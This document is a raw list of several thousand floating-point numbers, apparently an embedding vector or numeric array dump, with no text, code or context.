-0.005463190842419863, 0.0012253706809133291, -0.017943888902664185, 0.019975272938609123, -0.0012994315475225449, 0.0042820642702281475, -0.01803622394800186, 0.01803622394800186, 0.002639259910210967, 0.010518565773963928, -0.008564128540456295, -0.00033110976801253855, 0.0014802553923800588, 0.036657240241765976, -0.001465827925130725, -0.033640943467617035, 0.0036915012169629335, -0.030024465173482895, 0.011141831986606121, 0.0032240520231425762, 0.0018592161359265447, -0.012965460307896137, 0.006071066949516535, -0.017589936032891273, -0.0005573801463469863, 0.020236890763044357, 0.006702027283608913, -0.007259888108819723, 0.00558245787397027, -0.004485972225666046, 0.026962000876665115, 0.01116491574794054, -0.014435135759413242, -0.010703237727284431, -0.0018419033149257302, -0.019929105415940285, -0.0011994012165814638, 0.0003998805768787861, 0.0026565727312117815, -0.01337327528744936, -0.014312021434307098, 0.0020044525153934956, -0.00443980423733592, 0.00118497374933213, -0.014373578131198883, 0.0067520420998334885, -0.00034866316127590835, 0.01725137233734131, 0.007609994150698185, -0.020560065284371376, -0.02456127479672432, -0.01494298130273819, -0.029978297650814056, 0.0242381002753973, -0.011272639967501163, 0.00588254863396287, -0.01672813668847084, 0.016820471733808517, 0.027085116133093834, -0.005755587015300989, -0.002812389051541686, 0.012026714161038399, -0.010557039640843868, 0.019528983160853386, 0.009210478514432907, -0.003008602187037468, -0.011226472444832325, -0.0006958835292607546, 0.020637011155486107, -0.005963342264294624, 0.006013357080519199, -0.006463493220508099, -0.0013744542375206947, 0.014319716021418571, -0.013096269220113754, 0.0052477410063147545, 0.0003267815336585045, 0.009972247295081615, -0.0002635412383824587, -0.006440409459173679, -0.0024526650086045265, 0.0028008471708744764, 0.007182941772043705, -0.00981835462152958, 0.013188604265451431, -0.003064388409256935, -0.0051861838437616825, -0.006094151176512241, -0.003808844368904829, 0.015043011866509914, 0.00838715210556984, 0.0092412568628788, 0.027762243524193764, 0.0061095403507351875, -0.006863614544272423, 0.03157878294587135, -0.0026027103886008263, 0.0006574103608727455, 0.005039985757321119, -0.0015158430906012654, 0.009764491580426693, -0.007325292564928532, 0.0174822099506855, 0.007987030781805515, 0.02089862897992134, 0.007121384609490633, -0.008587212301790714, 0.0027181298937648535, 0.0013706068275496364, 0.014458219520747662, -0.02650032378733158, 0.02197587676346302, 0.005070764571428299, -0.008948860689997673, 0.0036299440544098616, -0.020406171679496765, -0.005224657244980335, -0.009702934883534908, 0.007067522499710321, 0.02114485763013363, -0.005259282886981964, -0.008448709733784199, -0.007267582695931196, 0.021652702242136, -0.003716508625075221, -0.005486274603754282, -0.010549345053732395, -0.043890196830034256, -0.024545885622501373, -0.0021333375480026007, 0.0013494465965777636, 0.005924868863075972, 0.011718928813934326, -0.00021569023374468088, 0.005428565200418234, -0.015912504866719246, 0.007486879825592041, -0.0012821186101064086, -0.002456512302160263, 0.02320702001452446, 0.005336229223757982, -0.03111710399389267, 0.005540137179195881, 0.005147710908204317, -0.010926381684839725, 0.0010089590214192867, -0.006782820913940668, 0.009272035211324692, -0.017097478732466698, 0.010180002078413963, -0.012950071133673191, -0.005332381930202246, 0.007640772499144077, -0.004224354866892099, 0.010649374686181545, -0.0006853034137748182, -0.0006045097834430635, 0.0008661273750476539, -0.003943500574678183, 0.022837676107883453, -0.020082997158169746, 0.021314138546586037, -0.003791531315073371, 0.001573552843183279, -0.02094479650259018, -0.0035549213644117117, 0.007987030781805515, -0.00031884643249213696, 0.03250213712453842, -0.0026738857850432396, -0.00811014510691166, 0.01625106856226921, 0.006097998470067978, -0.001108989235945046, -0.007825443521142006, 0.00022879516473039985, 0.018328620120882988, -0.0015446980250999331, -0.010249254293739796, 0.008718021214008331, 0.01104949600994587, 0.0022256732918322086, 0.0006857843254692852, 0.010426230728626251, -0.02122180350124836, 0.020667789503932, 0.0026950458995997906, 0.006194181274622679, -0.021914320066571236, -0.015112263150513172, -0.005901785101741552, 0.004355163313448429, -0.003764600260183215, 0.008841135539114475, 0.012926986441016197, -0.012611506506800652, -0.00907966960221529, -0.014465914107859135, -0.003687653923407197, -0.009002722799777985, 0.01545852143317461, 0.01760532520711422, -0.012788483873009682, -0.024099597707390785, 0.006436562165617943, -0.013973456807434559, 0.013611809350550175, -0.005609388928860426, 0.005436259787529707, 0.014612112194299698, -0.0081486189737916, -0.0036972721572965384, -0.0035164481960237026, -0.0007492650765925646, 0.000592486874666065, -0.0014081181725487113, -0.011418838053941727, -0.0032490596640855074, 0.008002420887351036, 0.01156503614038229, 0.017143646255135536, -0.013003933243453503, -0.01640496216714382, 0.0024988327641040087, -0.010741710662841797, -0.003479898674413562, -0.0014985301531851292, 0.005728655960410833, -0.02074473537504673, 0.0005030367756262422, -0.004789910279214382, 0.012880818918347359, 0.000653563067317009, 0.03588777780532837, 0.007671551313251257, 0.016543464735150337, 0.016112565994262695, 0.0023218560963869095, 0.0008925776928663254, 0.012680758722126484, -0.014050403609871864, 0.017359096556901932, 0.005686335265636444, 0.02189893089234829, -0.0015264232642948627, -0.0036799591034650803, 0.006494272034615278, 0.0033625555224716663, 0.0036222494672983885, 0.01672813668847084, -0.0020794752053916454, 0.03321004658937454, -0.009302813559770584, -0.009564431384205818, -0.014973759651184082, -0.006121082231402397, 0.002273764694109559, -0.01657424308359623, 0.006621233653277159, -0.014719836413860321, -0.01422738004475832, 0.01602023094892502, 0.0013311718357726932, 0.023853369057178497, 0.007048285566270351, 0.010272338055074215, -0.023499416187405586, -0.000029906881536589935, -0.006013357080519199, -0.0028547095134854317, -0.008456404320895672, 0.0036241731140762568, -0.00808706134557724, 0.02011377550661564, -0.004085851367563009, 0.005266977474093437, -0.008617991581559181, -0.0035395321901887655, 0.003672264516353607, -0.013157825917005539, 0.006317295599728823, -0.012803873047232628, 0.00850257184356451, -0.005347771570086479, 0.03154800459742546, 0.010418536141514778, 0.007706176955252886, 0.008571823127567768, 0.019759822636842728, -0.004570613149553537, 0.012211386114358902, -0.002766221296042204, -0.004493666812777519, -0.005824838764965534, -0.013319413177669048, -0.005963342264294624, -0.013357886113226414, -0.0007997611537575722, 0.014304326847195625, -0.01524307206273079, -0.017974667251110077, -0.002608481328934431, 0.008818051777780056, -0.013842648826539516, 0.0011522716376930475, 0.005336229223757982, 0.020313836634159088, 0.004143560770899057, 0.008733410388231277, -0.0026508017908781767, -0.02117563597857952, 0.0004381132894195616, 0.006371157709509134, -0.0011917066294699907, -0.01612795516848564, 0.0032432887237519026, -0.007609994150698185, 0.02857787534594536, 0.0152969341725111, -0.009348982013761997, 0.015027622692286968, -0.0020121471025049686, -0.02019072324037552, -0.009118142537772655, 0.024191932752728462, 0.008671853691339493, 0.003981973510235548, -0.012303721159696579, -0.0007987992721609771, -0.010372367687523365, 0.02232983149588108, 0.021283360198140144, 0.00008500167314196005, 0.010272338055074215, -0.018374787643551826, -0.000031439798476640135, -0.010364673100411892, 0.00641732569783926, 0.015343102626502514, 0.006613538600504398, 0.020806293934583664, 0.009125837124884129, -0.013919594697654247, -0.0014119655825197697, -0.014927592128515244, -0.03754981979727745, -0.019682876765727997, -0.016158733516931534, 0.009695240296423435, 0.011072579771280289, 0.008625686168670654, 0.018851855769753456, -0.007452254183590412, -0.011611204594373703, -0.005401633679866791, 0.00767924590036273, -0.0015639346092939377, 0.007105995435267687, -0.004939955659210682, 0.025253791362047195, -0.003108632517978549, 0.014704447239637375, 0.006932866293936968, 0.006313447840511799, -0.01705131120979786, -0.029147276654839516, -0.004224354866892099, -0.005470885429531336, -0.016066398471593857, 0.019421258941292763, -0.014196601696312428, -0.00012792331108357757, 0.035549212247133255, -0.015835558995604515, -0.006478882860392332, -0.01562010869383812, 0.0018948038341477513, 0.013380969874560833, -0.022545279935002327, 0.01685125008225441, -0.0006934789707884192, 0.00975679699331522, -0.009464400820434093, -0.0070136599242687225, -0.0026238705031573772, 0.016481908038258553, 0.010549345053732395, 0.02182198502123356, 0.01883646659553051, 0.0011580425780266523, -0.01074940524995327, -0.03043997660279274, 0.006998270750045776, 0.0070752170868217945, 0.0005068840691819787, 0.024822892621159554, -0.019328923895955086, -0.019759822636842728, -0.0014946828596293926, -0.027962304651737213, 0.004266675096005201, -0.018313230946660042, -0.017913110554218292, -0.009649072773754597, -0.0005270824767649174, 0.015627803280949593, 0.003083624877035618, -0.01019539125263691, -0.004382094833999872, -0.010741710662841797, 0.006198028568178415, -0.028700988739728928, -0.008187091909348965, 0.009195089340209961, 0.005809449590742588, -0.002521916525438428, 0.008848830126225948, 0.011034106835722923, 0.020713957026600838, -0.007979336194694042, 0.013681061565876007, -0.018898023292422295, -0.01355025265365839, 0.0057363505475223064, 0.021652702242136, -0.013011627830564976, 0.023099293932318687, 0.012634591199457645, 0.0059787314385175705, 0.0062749749049544334, -0.005897937808185816, 0.007517658639699221, 0.01680508255958557, -0.006532744970172644, -0.0060903034172952175, 0.024976786226034164, 0.010464703664183617, 0.013011627830564976, 0.00002993694033648353, 0.00326829613186419, -0.02793152444064617, -0.009787575341761112, 0.004524445626884699, -0.00653659226372838, -0.010895603336393833, -0.02690044417977333, 0.008733410388231277, 0.017220593988895416, -0.003997362684458494, -0.023068515583872795, 0.0016091405414044857, -0.006486577447503805, 0.011711234226822853, 0.0200676079839468, -0.004762979224324226, 0.0039781262166798115, -0.007713871542364359, 0.005493969190865755, -0.0005419908557087183, -0.003108632517978549, 0.006571218371391296, -0.004089698661118746, 0.005478580016642809, -0.024576663970947266, 0.0162972379475832, -0.009964552707970142, -0.0009118142770603299, -0.018497902899980545, 0.018020834773778915, 0.003360631875693798, 0.0016360718291252851, -0.004559071268886328, -0.020883239805698395, -0.0012648056726902723, -0.014135044999420643, 0.003664569929242134, 0.004528292920440435, -0.006055677775293589, -0.012265248224139214, 0.003304845653474331, 0.012542255222797394, -0.007256040815263987, 0.0033548609353601933, -0.0024334283079952, -0.003412570571526885, -0.03730358928442001, 0.008887303061783314, -0.016343405470252037, 0.01597406156361103, -0.0035683868918567896, -0.002539229579269886, 0.002910495735704899, -0.00838715210556984, -0.013773396611213684, -0.01357333641499281, 0.013280940242111683, 0.011249556206166744, -0.011311113834381104, -0.010510871186852455, -0.009549042209982872, 0.0148044778034091, -0.008617991581559181, 0.00017962163838092238, -0.0002993693924508989, 0.006890545599162579, -0.00991838425397873, -0.013265551067888737, 0.012342195026576519, -0.006598149426281452, 0.0005309298285283148, -0.005039985757321119, 0.013896510936319828, 0.015281544998288155, -0.0028316257521510124, 0.012434530071914196, -0.01725137233734131, 0.0017957354430109262, -0.009849132969975471, -0.007740803062915802, -0.004166644997894764, 0.005940258037298918, -0.015627803280949593, -0.003154800273478031, -0.013981152325868607, 0.0002707549720071256, 0.018374787643551826, -0.007329139858484268, 0.0025738554541021585, -0.003918492700904608, 0.0060479831881821156, 0.00656737107783556, -0.009348982013761997, -0.006748194806277752, -0.0014110036427155137, 0.007152163423597813, -0.0234532468020916, 0.0023584056179970503, 0.006890545599162579, 0.015866337344050407, -0.001277309376746416, 0.017666881904006004, 0.014396661892533302, 0.01367336604744196, -0.031855788081884384, 0.009564431384205818, 0.003939653281122446, 0.007279124576598406, 0.013773396611213684, -0.026438765227794647, -0.015119957737624645, 0.006655859295278788, -0.008671853691339493, -0.000912295188754797, 0.02439199388027191, -0.00045927352039143443, -0.001996757695451379, -0.006086456123739481, -0.01267306413501501, 0.004959192126989365, -0.003876172471791506, -0.0043436214327812195, 0.0011638135183602571, 0.010572428815066814, 0.022914623841643333, -0.02630026265978813, 0.006605844013392925, 0.00142831658013165, 0.008456404320895672, -0.007044438272714615, 0.006378852296620607, 0.015604719519615173, 0.008725715801119804, 0.008310206234455109, 0.00024334283079952002, -0.012457613833248615, -0.018497902899980545, -0.021929709240794182, -0.005209268070757389, 0.0032317466102540493, -0.012711537070572376, 0.013034711591899395, 0.006005662493407726, 0.0025738554541021585, -0.01130341924726963, 0.021160246804356575, -0.0009199897758662701, -0.02599247731268406, -0.02114485763013363, -0.011357281357049942, 0.018344009295105934, 0.011657372117042542, 0.01204210426658392, 0.0018746054265648127, -0.015881726518273354, 0.021883541718125343, -0.014473608694970608, -0.010503176599740982, -0.005755587015300989, 0.01088790874928236, -0.008171702735126019, -0.0389348529279232, -0.01406579278409481, 0.019544372335076332, 0.00726373540237546, 0.01532001793384552, -0.0021083299070596695, 0.004624475724995136, 0.016004841774702072, -0.01327324565500021, -0.007825443521142006, -0.015304628759622574, 0.018574848771095276, -0.014119654893875122, 0.0038376993034034967, 0.0004424415237735957, 0.02940889447927475, -0.008995028212666512, 0.00951826386153698, -0.007636925205588341, 0.012319110333919525, -0.011395754292607307, 0.012072882615029812, 0.00981835462152958, -0.004397484008222818, -0.003912721760571003, 0.0025373059324920177, -0.008040893822908401, 0.010803267359733582, -0.015650887042284012, -0.00405507255345583, 0.00901811197400093, 0.012411446310579777, -0.0013532938901335, -0.0010137681383639574, -0.008264037780463696, 0.03810383379459381, 0.004524445626884699, -0.004547529388219118, 0.003651104401797056, -0.011411143466830254, 0.01911347359418869, 0.0004996703355573118, 0.014104265719652176, -0.017143646255135536, -0.021914320066571236, 0.008694937452673912, 0.0013965762918815017, 0.004008905030786991, 0.01823628507554531, 0.005066917277872562, -0.010764794424176216, 0.013142436742782593, -0.015089179389178753, -0.003764600260183215, -0.004997665528208017, 0.008848830126225948, 0.021114079281687737, 0.024869060143828392, -0.015681665390729904, 0.0034337309189140797, 0.0023603292647749186, 0.004682185593992472, -0.013904205523431301, -0.002343016443774104, -0.010103056207299232, 0.002752755768597126, -0.012342195026576519, 0.010503176599740982, -0.0042820642702281475, -0.010764794424176216, -0.007902390323579311, -0.011880516074597836, -0.004643712192773819, -0.02142186462879181, -0.01505840104073286, 0.005320840049535036, -0.009533653035759926, 0.013027017004787922, 0.0069867284037172794, 0.015512384474277496, -0.027608349919319153, -0.0025796263944357634, -0.010549345053732395, -0.0048822457902133465, 0.013527167961001396, 0.004643712192773819, -0.022837676107883453, 0.004362857900559902, 0.022468334063887596, 0.015689359977841377, 0.010072276927530766, 0.009402844123542309, -0.01888263411819935, -0.020436950027942657, 0.00896424986422062, -0.002560389693826437, 0.007987030781805515, -0.008379457518458366, 0.012165217660367489, 0.009233562275767326, 0.0023083905689418316, -0.02277611941099167, -0.000008611378689238336, -0.018390178680419922, -0.019852157682180405, -0.0077446503564715385, 0.009033501148223877, 0.008456404320895672, -0.010333894751966, 0.012880818918347359, -0.0017370638670399785, -0.013173215091228485, -0.015989450737833977, -0.004489819519221783, -0.009933773428201675, -0.013742618262767792, -0.025977088138461113, 0.007152163423597813, 0.008633380755782127, 0.018190117552876472, -0.00041094160405918956, 0.005982578732073307, 0.034625858068466187, -0.01585094816982746, 0.0081486189737916, -0.0059787314385175705, 0.011134136468172073, 0.030255304649472237, -0.02360714040696621, 0.00046720862155780196, 0.0015543162589892745, 0.0066481647081673145, -0.004112782422453165, 0.006074914243072271, 0.0089411661028862, 0.01903652772307396, -0.010649374686181545, 0.0013398283626884222, -0.022068213671445847, 0.009449011646211147, -0.01228063739836216, 0.005486274603754282, -0.009510569274425507, -0.013003933243453503, 0.013888816349208355, 0.014519776217639446, -0.0005280443583615124, 0.013665671460330486, 0.004205117933452129, 0.019698265939950943, -0.0026950458995997906, 0.024730557575821877, -0.008371762931346893, 0.007640772499144077, 0.0036241731140762568, -0.010664763860404491, -0.008379457518458366, 0.018190117552876472, 0.0011638135183602571, -0.0152969341725111, -0.018928801640868187, 0.020375393331050873, 0.029424283653497696, -0.019375091418623924, 0.0038126916624605656, 0.021591145545244217, 0.005428565200418234, 0.0020025288686156273, -0.023745642974972725, 0.0016755068209022284, -0.006551981903612614, 0.00767924590036273, 0.005628625396639109, -0.012249859049916267, -0.008402541279792786, -0.005728655960410833, 0.0009868369670584798, 0.029039552435278893, 0.0016764686442911625, -0.0015927894273772836, 0.007052132859826088, 0.028639432042837143, 0.025530798360705376, 0.004913024604320526, 0.004120477009564638, -0.009410538710653782, -0.011688150465488434, -0.02034461498260498, 0.018528681248426437, 0.007856222800910473, -0.01612795516848564, 0.005401633679866791, -0.007294514216482639, 0.017589936032891273, -0.021391086280345917, -0.01994449459016323, -0.011511174030601978, -0.022791508585214615, -0.005320840049535036, -0.0009214325691573322, 0.004462888464331627, 0.015604719519615173, 0.014427440240979195, 0.0012811567867174745, 0.02810080721974373, 0.01685125008225441, 0.008394846692681313, 0.01906730607151985, 0.00714446883648634, 0.0017909263260662556, 0.005986426025629044, -0.006217265035957098, 0.0006468302453868091, 0.008071672171354294, 0.007721566129475832, 0.01582016982138157, -0.017112867906689644, -0.0002779686765279621, 0.007213720120489597, -0.0049514975398778915, -0.028593264520168304, -0.021160246804356575, 0.022391388192772865, 0.005347771570086479, 0.035826221108436584, -0.005574763286858797, 0.005717113614082336, 0.00991838425397873, 0.025576967746019363, -0.022945402190089226, -0.019205808639526367, 0.00026786947273649275, -0.019682876765727997, -0.013742618262767792, -0.004316690377891064, 0.01200363039970398, -0.010695543140172958, 0.01058781798928976, 0.008433319628238678, -0.010834045708179474, 0.007175247184932232, 0.0057863653637468815, -0.008356373757123947, 0.00874110497534275, -0.00570172443985939, 0.008356373757123947, -0.020960185676813126, -0.023668697103857994, -0.0194674264639616, -0.009695240296423435, 0.022668395191431046, 0.0059094796888530254, -0.012519171461462975, 0.02069856785237789, -0.004293606150895357, 0.012903902679681778, -0.019528983160853386, -0.026407986879348755, 0.00904119573533535, -0.002075627911835909, -0.006432714872062206, -0.005778670776635408, 0.012811567634344101, 0.007409933488816023, -0.011926684528589249, -0.008587212301790714, -0.020052218809723854, 0.0036549516953527927, -0.010318505577743053, 0.013327107764780521, 0.011434227228164673, 0.0001547342981211841, 0.007686940487474203, 0.007386849727481604, 0.009502874687314034, -0.02606942318379879, 0.011095663532614708, -0.019375091418623924, -0.02232983149588108, 0.012688453309237957, 0.01160351000726223, 0.017297539860010147, 0.005290061701089144, -0.02400726079940796, -0.008302511647343636, 0.0022968484554439783, -0.01994449459016323, -0.006394241936504841, 0.017913110554218292, 0.0009103714837692678, -0.016558853909373283, 0.011203388683497906, -0.008402541279792786, -0.008371762931346893, 0.008787273429334164, 0.0030759302899241447, -0.006682790350168943, 0.026531102135777473, -0.0074830325320363045, -0.0186825729906559, 0.014019625261425972, -0.009441317059099674, -0.00724065164104104, 0.008725715801119804, 0.005944105796515942, -0.014589028432965279, -0.011757402680814266, 0.01313474215567112, 0.013657976873219013, 0.0008560281712561846, 0.0023372455034404993, 0.003239441430196166, -0.013581031002104282, 0.0015071866801008582, 0.011041801422834396, -0.017620714381337166, 0.02750062569975853, 0.01438896730542183, -0.008264037780463696, -0.0264233760535717, -0.0009627912077121437, -0.002970129018649459, 0.03887329623103142, -0.00035756008583121, 0.0046052392572164536, 0.0028393203392624855, 0.013096269220113754, 0.0036915012169629335, -0.008694937452673912, -0.01077248901128769, 0.027392901480197906, -0.00626728031784296, 0.0097337132319808, 0.007606146857142448, -0.004859162028878927, -0.022006656974554062, -0.0038107680156826973, -0.0033548609353601933, -0.0005530518828891218, -0.016589632257819176, -0.0005737312021665275, 0.0006828988553024828, -0.018974969163537025, 0.030024465173482895, -0.009048891253769398, -0.0068135992623865604, -0.00961829349398613, 0.007336834445595741, 0.014350494369864464, -0.013457916676998138, 0.023591751232743263, -0.04284372925758362, -0.002039078390225768, -0.0016812777612358332, -0.0057440451346337795, 0.026407986879348755, 0.0074830325320363045, 0.001749567687511444, 0.004005057737231255, -0.014081181958317757, -0.01162659376859665, 0.023376300930976868, 0.006628928240388632, -0.009133531711995602, -0.011172610335052013, -0.002972052898257971, 0.016066398471593857, -0.0018072774400934577, -0.008625686168670654, -0.020837072283029556, 0.01871335320174694, 0.03354860842227936, -0.013019322417676449, 0.0013254008954390883, 0.008671853691339493, 0.011034106835722923, -0.00030441899434663355, -0.022083602845668793, -0.008633380755782127, 0.008617991581559181, -0.0011282258201390505, -0.0226530060172081, 0.0019948340486735106, -0.002500756410881877, 0.014635195955634117, -0.01672813668847084, -0.006763583980500698, -0.0015033392701297998, -0.0008026466239243746, 0.02928578108549118, 0.013265551067888737, 0.0024411228951066732, -0.020206112414598465, -0.023991871625185013, 0.004143560770899057, 0.012626895681023598, 0.002331474330276251, -0.009187393821775913, 0.011234167031943798, -0.011795875616371632, -0.008694937452673912, 0.0039031035266816616, 0.010156918317079544, -0.01725137233734131, 0.02320702001452446, 0.022437555715441704, 0.0035299137234687805, 0.0017582240980118513, 0.027485236525535583, -0.014935286715626717, -0.0023891841992735863, -0.0180823914706707, 0.007748497650027275, -0.01652807556092739, 0.02305312640964985, -0.005755587015300989, 0.006367310415953398, -0.0036222494672983885, 0.010387756861746311, 0.009533653035759926, 0.0032721436582505703, -0.0033452424686402082, 0.0016168352449312806, 0.001839017728343606, -0.019805990159511566, -0.007025201804935932, 0.026007866486907005, 0.014104265719652176, -0.004828383680433035, -0.009579820558428764, -0.00683668302372098, 0.024853670969605446, 0.013519473373889923, -0.011611204594373703, -0.006736652925610542, 0.017990056425333023, 0.01325016189366579, 0.009348982013761997, 0.007933168672025204, -0.010603207163512707, -0.002483443357050419, 0.013396359980106354, 0.004024294205009937, -0.009749102406203747, -0.014881424605846405, 0.014211990870535374, 0.002562313573434949, -0.008841135539114475, 0.02750062569975853, -0.0284085925668478, 0.01438896730542183, -0.0021506506018340588, -0.02853170596063137, -0.00021472841035574675, 0.029624344781041145, 0.02169887162744999, -0.007736955303698778, 0.004166644997894764, 0.005193878430873156, -0.02534612827003002, 0.02002144046127796, 0.006209570448845625, 0.009449011646211147, -0.005120779387652874, -0.012365278787910938, 0.0016120260115712881, 0.006886698305606842, -0.00907966960221529, -0.022899234667420387, -0.00991838425397873, -0.007775428704917431, -0.008033199235796928, -0.0012523018522188067, 0.023114683106541634, 0.00038954088813625276, 0.006786668207496405, -0.01285773515701294, 0.00937976036220789, -0.0038723251782357693, 0.014627501368522644, 0.0012417216785252094, -0.0038492411840707064, -0.010703237727284431, 0.007598452270030975, 0.029778238385915756, 0.008210175670683384, -0.011041801422834396, 0.0024045733734965324, -0.011657372117042542, 0.012080577202141285, 0.004574460443109274, -0.0019717502873390913, -0.025484630838036537, 0.005636319983750582, 0.002895106328651309, -0.015504689887166023, -0.025361517444252968, -0.0089411661028862, 0.013873427174985409, -0.002104482613503933, -0.0005054413340985775, -0.026161758229136467, 0.009333591908216476, -0.0019563608802855015, -0.0015273850876837969, 0.01564319245517254, 0.008679548278450966, 0.0014956446830183268, 0.0066904849372804165, -0.0026565727312117815, 0.011688150465488434, -0.01508148480206728, 0.0049514975398778915, 0.023714864626526833, 0.010895603336393833, -0.027054335922002792, 0.008871913887560368, -0.013127047568559647, 0.03222513198852539, -0.01321168802678585, 0.0018063156167045236, -0.022560669109225273, -0.023222409188747406, -0.022622227668762207, 0.0086410753428936, 0.0030740066431462765, 0.013919594697654247, 0.009295118972659111, 0.004147408064454794, -0.007471490651369095, -0.010672458447515965, 0.02491522766649723, -0.001360988593660295, -0.0019477044697850943, 0.011172610335052013, 0.009464400820434093, -0.009148920886218548, 0.0007055018213577569, -0.0018111247336491942, -0.012511476874351501, 0.0035933945327997208, 0.000638173776678741, 0.002964358078315854, 0.024130376055836678, 0.03561077266931534, -0.014658279716968536, 0.017389874905347824, 0.002993213012814522, 0.005747892428189516, -0.008541044779121876, -0.008617991581559181, 0.01365028228610754, -0.008825746364891529, -0.015143041498959064, -0.0021083299070596695, -0.0014725608052685857, 0.011657372117042542, 0.0018495979020372033, -0.0023680238518863916, -0.0001965738774742931, 0.015466216020286083, -0.02157575637102127, -0.030609257519245148, 0.02229905314743519, 0.010464703664183617, 0.012642285786569118, 0.01800544559955597, -0.008733410388231277, -0.0052477410063147545, 0.008748800493776798, 0.03591855615377426, -0.016697358340024948, -0.006017204374074936, -0.011911295354366302, -0.006802057381719351, 0.003041304415091872, -0.02837781421840191, 0.02670038305222988, 0.008733410388231277, 0.0033894868101924658, -0.009348982013761997, 0.0034452727995812893, 0.0008098603575490415, 0.014335105195641518, 0.007829290814697742, 0.011272639967501163, -0.011857432313263416, 0.00001528406937723048, 0.002229520585387945, -0.0016120260115712881, -0.007002118043601513, -0.03511831536889076, -0.0038069207221269608, 0.0038588594179600477, -0.01068784762173891, 0.009549042209982872, -0.008610296994447708, 0.017943888902664185, 0.0005751739954575896, 0.019359702244400978, -0.022437555715441704, -0.008310206234455109, -0.0024507413618266582, -0.0014417822239920497, -0.005467038135975599, -0.018590237945318222, -0.03056308999657631, 0.0014465913409367204, 0.01381186954677105, 0.01577400229871273, -0.041551027446985245, -0.001285004080273211, -0.0155970249325037, 0.004228202160447836, -0.003164418740198016, 0.006082608830183744, -0.006678943056613207, -0.0004972657770849764, 0.020283058285713196, -0.02770068682730198, 0.008379457518458366, 0.032963816076517105, -0.012603811919689178, 0.010787878185510635, -0.02813158556818962, 0.00750996358692646, -0.008279426954686642, -0.012496087700128555, 0.007621536031365395, -0.0009791422635316849, -0.011834348551928997, 0.017620714381337166, 0.012703842483460903, 0.0030451517086476088, 0.0014533242210745811, -0.011211083270609379, 0.01190360076725483, -0.004870703909546137, -0.0005910441395826638, 0.002768144942820072, -0.0016360718291252851, -0.011195694096386433, 0.007182941772043705, 0.0062749749049544334, -0.0015071866801008582, 0.024745946750044823, 0.0011570807546377182, -0.02149881049990654, -0.008702632039785385, 0.012688453309237957, 0.029593566432595253, -0.02380720153450966, 0.024145765230059624, 0.01337327528744936, -0.007575368043035269, -0.030747761949896812, -0.02837781421840191, -0.002521916525438428, -0.023376300930976868, -0.00037126612733118236, 0.009348982013761997, -0.017743827775120735, -0.03865784779191017, 0.0003065831260755658, 0.005151558201760054, -0.0026334887370467186, -0.010957160033285618, -0.008025504648685455, 0.0009603866492398083, -0.004089698661118746, 0.02606942318379879, 0.015558551996946335, -0.002454588655382395, -0.002818159991875291, -0.015989450737833977, 0.013319413177669048, -0.0011214930564165115, 0.015227682888507843, 0.009933773428201675, -0.012057493440806866, 0.016820471733808517, 0.030132191255688667, 0.009025806561112404, 0.01228063739836216, -0.006501966621726751, -0.016958976164460182, 0.023976482450962067, -0.00740223890170455, -0.02539229579269886, -0.0057132663205266, -0.009002722799777985, 0.018190117552876472, 0.010380062274634838, 0.02172964997589588, -0.017897721379995346, -0.009779880754649639, 0.014458219520747662, -0.002810465404763818, -0.002677733078598976, -0.024222711101174355, -0.0041704922914505005, -0.011087968945503235, 0.0044051785953342915, 0.00021088108769617975, 0.055616822093725204, -0.0032740673050284386, 0.0025950155686587095, -0.005878701340407133, -0.007344529032707214, -0.007167552597820759, 0.0033029220066964626, -0.023545583710074425, 0.00357223441824317, -0.0022930011618882418, -0.01660502329468727, -0.018297841772437096, -0.005955647677183151, -0.01091099251061678, -0.009025806561112404, -0.010818656533956528, -0.003926187753677368, -0.006948255468159914, -0.006063372362405062, -0.004797604866325855, -0.013142436742782593, 0.003958889748901129, -0.003139411099255085, 0.023191630840301514, 0.005690182559192181, 0.01104949600994587, 0.0033798683434724808, 0.00443980423733592, 0.020252279937267303, -0.028439370915293694, 0.035980112850666046, -0.006563523784279823, 0.020436950027942657, 0.008117839694023132, 0.024976786226034164, 0.013758007436990738, -0.02189893089234829, 0.013765702024102211, -0.005697877146303654, -0.006459645926952362, -0.004836078267544508, -0.003458738559857011, -0.01843634620308876, -0.01717442460358143, -0.014427440240979195, 0.004078156780451536, 0.01943664811551571, -0.006471188273280859, 0.005066917277872562, 0.0053708553314208984, -0.00866415910422802, 0.01392728928476572, -0.013165520504117012, 0.00016892128041945398, -0.01508148480206728, -0.010364673100411892, -0.0036280204076319933, 0.005093848332762718, -0.006013357080519199, 0.0008844021358527243, 0.007090606261044741, -0.014535165391862392, 0.0034395018592476845, 0.007340681739151478, -0.01357333641499281, 0.005690182559192181, 0.020975574851036072, 0.0022699174005538225, -0.002898953855037689, 0.013288634829223156, 0.0030355334747582674, -0.0081486189737916, -0.021191025152802467, -0.0019467426463961601, -0.008564128540456295, -0.022822286933660507, 0.015396964736282825, 0.0007925474201329052, 0.006409631110727787, 0.0005506473244167864, 0.033764056861400604, 0.0035222191363573074, 0.010133834555745125, -0.0074214753694832325, -0.0011416914639994502, 0.0046475594863295555, -0.031009379774332047, 0.009525958448648453, -0.012742315419018269, 0.012226775288581848, 0.027962304651737213, 0.016681969165802002, -0.001960208173841238, -0.006121082231402397, -0.01285773515701294, 0.018020834773778915, -0.010372367687523365, 0.0011214930564165115, 0.011434227228164673, -0.0014408204006031156, 0.02503834292292595, 0.014442830346524715, -0.02320702001452446, 0.004485972225666046, 0.00806397758424282, -0.00419357605278492, -0.022160548716783524, -0.011849737726151943, -0.00458984961733222, 0.017620714381337166, 0.020129164680838585, -0.005963342264294624, -0.0012859659036621451, -0.009125837124884129, 0.011003328487277031, 0.019544372335076332, -0.018744131550192833, 0.005971036851406097, 0.009410538710653782, -0.0005636319983750582, -0.002312237862497568, 0.005367008037865162, 0.026715772226452827, -0.006990576162934303, 0.0030817012302577496, -0.005640167277306318, -0.011934379115700722, -0.0028239311650395393, 0.013257856480777264, 0.03450274467468262, 0.00653659226372838, 0.0076138414442539215, -0.0000014652869140263647, 0.024730557575821877, 0.0035703107714653015, 0.022022046148777008, 0.010995633900165558, 0.043736305087804794, 0.0061095403507351875, 0.026238705962896347, -0.000995493377558887, 0.05176950618624687, -0.017697660252451897, -0.002897030208259821, -0.027239007875323296, 0.035302985459566116, 0.009487484581768513, -0.004143560770899057, -0.020683178678154945, -0.010549345053732395, -0.00008464098209515214, 0.011180304922163486, 0.03573388606309891, -0.0020256126299500465, -0.008156313560903072, -0.0015677819028496742, -0.010164612904191017, 0.010795572772622108, 0.016620412468910217, -0.0045975446701049805, 0.005724808666855097, -0.01605100929737091, -0.007344529032707214, 0.015989450737833977, 0.006636622827500105, -0.006925171706825495, 0.004797604866325855, 